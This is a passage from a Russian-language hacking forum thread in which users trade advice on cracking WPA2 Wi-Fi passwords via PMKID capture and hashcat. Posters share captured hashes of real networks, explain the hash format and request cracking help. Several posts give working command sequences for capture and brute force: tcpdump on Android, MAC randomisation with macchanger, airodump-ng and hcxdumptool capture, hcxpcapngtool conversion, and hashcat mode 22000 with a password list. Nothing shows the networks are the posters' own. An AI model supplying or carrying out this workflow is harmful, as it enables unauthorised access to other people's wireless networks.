Брут WPA2 без handshake используя PMKID + hashcat

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by Vikhedgehog, 6 Aug 2018.

  1. Slayer

    Slayer Member

    Joined:
    5 Nov 2016
    Messages:
    67
    Likes Received:
    8
    Reputations:
    0
    Кто подскажет - ловил хэндшейк по обыкновению с помощью airodump-ng, точка была без клиентов - наконец появился, решил воспользоваться случаем - airodump-ng выдал сначала сообщение о пойманном pmkid, потом о пойманном хэндшейке (раньше только о хэндшейке сообщал - недавно обновлял арч, видимо новое), cap конвертировал через сайт hashcat в hc22000, ниже содержание файла. Т.е. понятно, обе записи для одного реального клиента (мак один и тот-же) - первая pmkid, вторая - pmkid+хэндшейк, смущает то, что поле pmkid отличается - разве для одного и того-же клиента оно не должно совпадать? Т.е. одна из записей вероятно не валидна?

    WPA*01*ad311cb09a62909eababf5a2e04344f1*749d79ac137a*50b7c3d07526*52542d47504f4e2d31333741***
    WPA*02*8d169d6c8ca1273778c20d6367cfa496*749d79ac137a*50b7c3d07526*52542d47504f4e2d31333741*aa43069a2bc750549cab7cf0a25dbcb33887b46717a152995f2b8a29309910d0*0103007502010a00000000000000000000d0759f59238553ad392c083f180e3fece37867f9c48d6be17c4b6da316da42c2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac023c00*a2
     
    #281 Slayer, 14 Nov 2021
    Last edited: 14 Nov 2021
  2. Payer

    Payer Elder - Старейшина

    Joined:
    14 May 2010
    Messages:
    1,061
    Likes Received:
    5,203
    Reputations:
    63
    pmkid годен у двух записей.
    Просто пароль там сложный и долго нужно перебирать.
    Вы уж если ведете речь о пойманном хэндшейке так и выклажывайте его, а не огрызки обработки.
    Хотя тут и так ясно.
     
    binarymaster and Piligrim740 like this.
  3. Slayer

    Slayer Member

    Joined:
    5 Nov 2016
    Messages:
    67
    Likes Received:
    8
    Reputations:
    0
    Я именно в этой теме спросил, т.к. хотел уточнить про разные pmkid у одного и того же клиента - про пароль в курсе, выложил недавно в платную тему, но за такое (31^8) вряд ли кто возьмётся. Просто там пост с пойманным отдельно pmkid в hcxdumptool (не было клиентов), хотелось удостоверится что он не левый получился (т.е. разные - это нормально). А почему разные у одного клиента (про пост выше)? - я думал он рассчитывается исходя из мак точки, мак клиента имени точки и пароля wpa (я просто в хэшах не особо, вероятно ещё какакая-то информация подмешивается?).
     
    #283 Slayer, 14 Nov 2021
    Last edited: 14 Nov 2021
  4. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    365
    Likes Received:
    676
    Reputations:
    11
    Code:
    PROTOCOL*TYPE*PMKID/MIC*MACAP*MACCLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR
    
    PROTOCOL = Fixed string "WPA"
    TYPE = 01 for PMKID, 02 for EAPOL
    PMKID/MIC = PMKID if TYPE=01, MIC if TYPE=02
    MACAP = MAC of AP
    MACCLIENT = MAC of CLIENT
    ESSID = network name (ESSID) in HEX
    ANONCE = ANONCE
    EAPOL = EAPOL (SNONCE is in here)
    MESSAGEPAIR = Bitmask:
    
    WPA*01*... - Вот этот только PMKID
     
    Slayer likes this.
  5. Slayer

    Slayer Member

    Joined:
    5 Nov 2016
    Messages:
    67
    Likes Received:
    8
    Reputations:
    0
    Вот, спасибо оно ) - теперь ясно - варьируется PMKID/MIC, и не подумаешь.

    Ещё хотел такой своеобразный вопрос задать - нельзя ли в hcxdumptool задать мак фейкового клиента (которого она "подключает")? - просто эксперимент хочется провести с одним и тем-же клиентом - в хэлпе вроде как нет такого, т.е. по умолчанию каждый раз новый генерируется.
     
  6. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    365
    Likes Received:
    676
    Reputations:
    11
    Только код править, вот строчки, где он рандомизируется https://github.com/ZerBea/hcxdumpto...650a6d38b356319f697/hcxdumptool.c#L8084-L8091
    Можно забить туда константы. Только не забудьте, что первый байт MAC нельзя "от балды" ставить.
    А проще и быстрее подключаться самому, с другого клиента. В телефон можно вбить любой пароль, и подключаться.
     
    Slayer likes this.
  7. Slayer

    Slayer Member

    Joined:
    5 Nov 2016
    Messages:
    67
    Likes Received:
    8
    Reputations:
    0
    Ок, спасибо.
     
  8. -Shake-

    -Shake- New Member

    Joined:
    28 Oct 2018
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    картинка в посте пропала.
    Я правильно понимаю, что tcpdump не пишет никаких слов/сообщение, что пойман pmkid?
    это только при анализе дампа (в акуле, например) можно узнать?
     
  9. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    365
    Likes Received:
    676
    Reputations:
    11
    Не пишет. Но, сколько я видел этих пакетов, pmkid всегда в конце. Поэтому, можно распечатать содержимое первого пакета (ключ -x), если там не нули в конце, это оно. Ну, или смотреть специализированным софтом.
     
  10. goginnm12

    goginnm12 Member

    Joined:
    28 Dec 2017
    Messages:
    36
    Likes Received:
    14
    Reputations:
    0
    развлекаюсь ваншотом (встроенная в телефон карта не всё может). он в лог сохраняет только имя, мак, пин и пас. если есть команда добавляющая данные, которые возвращает устройство "о себе" готов по возможности выгулять его)

    что б два раза не вставать:
    PMKID на android при помощи tcpdump
    1. установить tcpdump (для termux)
    pkg install tcpdump
    2. запустить команду:
    sudo tcpdump -nei wlan0 -s0 -xx -vv -w PMKID_$(date +"%Y-%m-%d-%H:%M:%S").cap
    3. подключиться с любым паролем (например 11111111) к точке(ам), контролировать получение пакетов в терминале
    4. прервать экзикуцию, обработать полученный файл
     
  11. dwais

    dwais New Member

    Joined:
    3 Jan 2017
    Messages:
    48
    Likes Received:
    2
    Reputations:
    0
    Доброго дня. Подскажите знающие рабочий способ на сегодняшний день получить PMKID.
    Например через VMware.
     
  12. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    Да способ вроде прежний, инициируете подключение с произвольным паролем, и смотрите в EAPOL пакете ( 1 of 4 ) отдала ли точка PMKID.
    А точки либо не отдают его вообще, либо отдают с нулевым значением, либо отдают годный к перебору PMKID.
    Для VMware скорее всего вам потребуется внешний WiFi адаптер!
     
    dwais likes this.
  13. dwais

    dwais New Member

    Joined:
    3 Jan 2017
    Messages:
    48
    Likes Received:
    2
    Reputations:
    0
    В общем получил вот такое. Чем-то оно полезно?
    WPA*02*2c9e9eaf659a11303ea4131a8e44ebbc*50ff2061a197*9c28f788a1b6*4b65656e657469632d33353434*b8f526056bc4b4b2767d2fc22f68727617926b1b590f833a56fdc0f20dd216da*0103007502010a00000000000000000005bbeaedade42c4b2178ece9437158c43a493d4c69e68f619f2d5d796f87694150000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*00

    Вот это 50ff2061a197 понятно mak, 4b65656e657469632d33353434 - это ssid. Дальше не знаю(
     
  14. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    Code:
    WPA*02*MIC*MAC_AP*MAC_CLIENT*ESSID*NONCE_AP*EAPOL_CLIENT*MESSAGEPAIR
    
    а PMKID
    Code:
    WPA*01*PMKID*MAC_AP*MAC_CLIENT*ESSID***
    
    Взято здесь https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2
     
    user100 and dwais like this.
  15. dwais

    dwais New Member

    Joined:
    3 Jan 2017
    Messages:
    48
    Likes Received:
    2
    Reputations:
    0
    значит PMKID не получен. Я правильно понимаю?
     
  16. moz9

    moz9 Well-Known Member

    Joined:
    29 Apr 2016
    Messages:
    78
    Likes Received:
    332
    Reputations:
    1
    Чет у меня разные свистки на чипах rt3070 вешаются примерно на таких моментах. (приходится реконнектить свисток). Причем pmkid ловил через аиродамп, когда ловил хендшейк. И я подумал мб есть какой-то патченный или модифицированный драйвер под этот чип? Как-то они неочень хорошо отрабатывают по-моему...
    upload_2022-2-8_16-49-49.png upload_2022-2-8_16-53-27.png
     
  17. Depris

    Depris New Member

    Joined:
    24 Jun 2021
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Добрый день, друзья. Споймал PMKID, может кто - то переделать для кота. Спасибо

    https://transfiles.ru/cl2g6
     
  18. 174region174

    174region174 Well-Known Member

    Joined:
    17 Feb 2021
    Messages:
    671
    Likes Received:
    3,646
    Reputations:
    45
    Скорее всего этот роутер не отдаёт PMKID. А скрипт не вешается. Просто не происходит в сети ни чего нового и ему нечего обновлять по информации на мониторе. Вот и кажется будто он висит.
     
  19. D9d9_tol9

    D9d9_tol9 New Member

    Joined:
    2 Apr 2012
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Всем привет. Подскажите, пожалуйста, мой алгоритм действий правильный?
    Прибиваем все лишнее и рандомизируем МАС
    airmon-ng check kill
    ifconfig wlan0 down
    macchanger -r wlan0
    ifconfig wlan0 up

    Переводим карточку в режим мониторинга
    airmon-ng start wlan0

    Собираем общую инфу о происходящем вокруг
    airodump-ng wlan0mon --wps --manufacturer --uptime --ignore-negative-one --write last_dump

    Далее либо получаем PMKID либо Аэродампом, но с одного роутра
    airodump-ng --bssid CC:2D:E0:AA:BB:CC -c 6 --write AP_crack wlan0mon --wps --manufacturer --uptime
    либо со всех доступных
    hcxdumptool -i wlan0mon -o PMKID --enable_status=1

    Далее конвертируем
    hcxpcapngtool -o clean_PMKID.22000 --all PMKID

    Скармливаем коту файл с собранной инфой.
    hashcat -m 22000 --status -w 3 clean_PMKID.22000 top1Mpassword.txt


    Собственно, 2 вопроса. Правильны ли мои действия? И все ли хеши в файле clean_PMKID.22000 проверяет hashcat?
    Уже начал сомневаться в правильности действий, не могу набрутить пароли...
     
  20. CRACK211

    CRACK211 Elder - Старейшина

    Joined:
    16 Sep 2009
    Messages:
    1,049
    Likes Received:
    1,127
    Reputations:
    11
    Кто в курсе, как ловить pmkid с телефона ? Может софт есть ?
     
Loading...